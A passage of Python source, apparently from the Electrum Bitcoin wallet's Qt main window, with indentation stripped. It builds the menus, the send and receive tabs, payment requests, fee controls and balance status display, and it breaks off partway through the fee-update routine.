if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.print_error("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected%s.png"%fork_str)
else:
icon = QIcon(":icons/status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
